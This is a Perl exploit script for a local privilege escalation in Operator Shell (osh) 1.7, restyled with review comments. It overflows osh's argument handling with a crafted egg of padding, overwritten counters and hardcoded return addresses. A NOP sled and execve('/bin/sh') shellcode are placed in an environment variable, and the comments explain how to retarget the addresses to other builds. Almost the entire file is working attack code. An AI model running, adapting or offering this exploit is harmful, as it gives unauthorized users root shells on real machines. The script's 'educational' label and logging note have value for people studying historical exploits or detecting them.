#!/usr/bin/perl
#
# OSH 1.7 (Operator Shell) local root exploit -- EDUCATIONAL purposes only.
#
# Originally by Charles Stevenson (core).  Restyled for readability; the
# bytes this script emits are unchanged.
#
# What the script does (per its own construction and the original author's
# comments): it runs "osh exit '<egg>'" with a fully controlled, minimal
# environment.  The egg is mostly '&' padding, then a positive int where
# NUMENTRY is expected, an AliasCounter of -1 (said to skip a for loop),
# and a small fake frame: the address of the string "exit" inside the osh
# binary (used twice) and a stack address (0xbffffe30) that is expected to
# point into the HELLCODE environment variable, where a 45-byte
# execve("/bin/sh") shellcode sits behind a NOP sled.
#
# Detection/forensics: osh logs to /var/log/osh.log, so a run of this
# (successful or not) is expected to leave a record there.
#
# Re-deriving the "exit" string address for another build:
#   sh-3.00$ xxd /usr/sbin/osh | grep exit | grep -v _exit
#   0005080: 6578 6974 006c 6f67 6f75 7400 7465 7374  exit.logout.test
#   sh-3.00$ osh more /proc/self/maps | grep osh
#   08048000-0804e000 r-xp 00000000 03:01 176445 /usr/sbin/osh
#   ^-- add the mapping base to the file offset 0x5080:
#   sh-3.00$ python -c "print hex(0x08048000 + 0x5080)"
#   0x804d080
#
# Upstream says osh also compiles on SunOS 4.1.3, Solaris 2.x, Unicos 6.x
# and 7.x (XMP/YMP), VAX Ultrix 4.2, SGI IRIX, HP/UX and AIX 3.2.5; no
# return addresses for those platforms are known here.

use strict;
use warnings;

# pack('l') is a native-endian signed 32-bit int; the targets are i386, so
# these come out little-endian.  Values above 0x7fffffff (e.g. 0xffffffff)
# wrap silently to the intended four bytes.
# NOTE(review): none of the 32-bit constants in this script contains a
# 0x00 byte (argv strings are NUL-terminated) or a 0x27 byte (which would
# close the single quote handed to the shell below).  Keep that property
# if you retarget the addresses.
my $exit_addy = pack('l',
    # 0x0804d39c    # Ubuntu Linux - osh_1.7-12_i386.deb
    0x0804d080      # Debian Linux stable/testing/unstable
                    #  - osh_1.7-11woody1_i386.deb
                    #  - osh_1.7-12_i386.deb
);

# 45-byte execve("/bin/sh") shellcode by anthema (taken from one of KF's
# exploits), containing no 0xff bytes.  It builds "/bin/sh\0" plus an argv
# array on the stack and issues int 0x80 with eax = 11 (execve).
my @shellcode = (
    "\x89\xe6",                # movl  %esp, %esi
    "\x83\xc6\x30",            # addl  $0x30, %esi
    "\xb8\x2e\x62\x69\x6e",    # movl  $0x6e69622e, %eax    (".bin")
    "\x40",                    # incl  %eax                 (-> "/bin")
    "\x89\x06",                # movl  %eax, (%esi)
    "\xb8\x2e\x73\x68\x21",    # movl  $0x2168732e, %eax    (".sh!")
    "\x40",                    # incl  %eax                 (-> "/sh!")
    "\x89\x46\x04",            # movl  %eax, 0x04(%esi)
    "\x29\xc0",                # subl  %eax, %eax
    "\x88\x46\x07",            # movb  %al, 0x07(%esi)      (NUL over the '!')
    "\x89\x76\x08",            # movl  %esi, 0x08(%esi)     (argv[0] = path)
    "\x89\x46\x0c",            # movl  %eax, 0x0c(%esi)     (argv[1] = NULL)
    "\xb0\x0b",                # movb  $0x0b, %al           (execve)
    "\x87\xf3",                # xchgl %esi, %ebx           (ebx = path)
    "\x8d\x4b\x08",            # leal  0x08(%ebx), %ecx     (ecx = argv)
    "\x8d\x53\x0c",            # leal  0x0c(%ebx), %edx     (edx = envp)
    "\xcd\x80",                # int   $0x80
);
my $nop_sled = "\x90" x (511 - 45);    # sled + 45-byte stub = 511 bytes
my $sc       = $nop_sled . join('', @shellcode);

print join('',
    "\n\n",
    "Operator Shell (osh) 1.7-12 root exploit\n",
    "----------------------------------------------\n",
    "Written by Charles Stevenson \n\n",
);

# Replace the whole environment with three known variables.  A minimal,
# fixed environment keeps the stack layout -- and therefore the hardcoded
# 0xbffffe30 guess for HELLCODE -- stable between runs.
%ENV = (
    HELLCODE => $sc,
    TERM     => 'linux',
    PATH     => '/usr/local/bin:/usr/bin:/bin',
);

# The payload handed to osh as its second argument.
my $egg = join('',
    '&' x 1019,                 # pad up to NUMENTRY
    pack('l', 0x01d5c001),      # overwrite with a positive int
    '&' x 20,                   # ampersands get past TTOOLONG
    pack('l', 0xffffffff),      # AliasCounter = -1 skips the for loop
    'core',                     # shameless self-promotion
    $exit_addy,                 # address of the "exit" string in osh
    pack('l', 0xbffffe30),      # expected address of the shellcode in ENV
    $exit_addy,                 # address of a NUL-terminated string
);

# NOTE(review): a single-string system() containing quote characters is
# run via "/bin/sh -c", so whatever the shell itself exports also ends up
# in osh's environment; the 0xbffffe30 value was presumably tuned with
# that in place.  List-form system('/usr/sbin/osh', 'exit', $egg) would
# avoid the shell entirely but may shift the stack -- re-measure the
# HELLCODE address before making that change.
system("/usr/sbin/osh exit '$egg'");

# EOF